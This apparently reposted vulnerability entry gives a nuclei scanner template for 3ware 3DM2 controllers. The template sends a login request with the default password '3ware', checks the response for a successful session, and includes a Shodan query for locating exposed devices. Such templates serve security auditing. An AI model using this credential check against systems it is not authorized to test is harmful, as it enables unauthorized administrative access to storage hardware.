3ware-default-login: 3ware Controller 3DM2 - Default Login

日期: 2025-08-01 | 影响软件: 3ware Controller 3DM2 | POC: 已公开

漏洞描述

The default password for logging in to the 3DM2 web interface of a 3ware controller is "3ware" for both the Administrator and User accounts.

PoC代码[已公开]

id: 3ware-default-login

info:
  name: 3ware Controller 3DM2 - Default Login
  author: ritikchaddha
  severity: high
  description: |
    The default password for logging in to the 3DM2 web interface of a 3ware controller is "3ware" for both the Administrator and User accounts.
  reference:
    - https://www.thomas-krenn.com/en/wiki/3ware_Controller_3DM2_Password
  metadata:
    max-request: 1
    shodan-query: title:"3ware"
  tags: default-login,3ware,3dm2,vuln

http:
  - raw:
      - |
        POST /login.html HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        whopwd={{username}}&thepwd={{password}}

    attack: pitchfork
    payloads:
      username:
        - a
      password:
        - 3ware

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'now logged in'

      - type: word
        part: set_cookie
        words:
          - 'TDMUSER='

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100a24d108b1be97d5c0c19766c06623fa7327baf8f02a6616f2fe508940bf4d8cb02206dfdbc3db4338ee26388aa38491b98904873941a5754eac522b1c438736a9eed:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/default-logins/3ware-default-login.yaml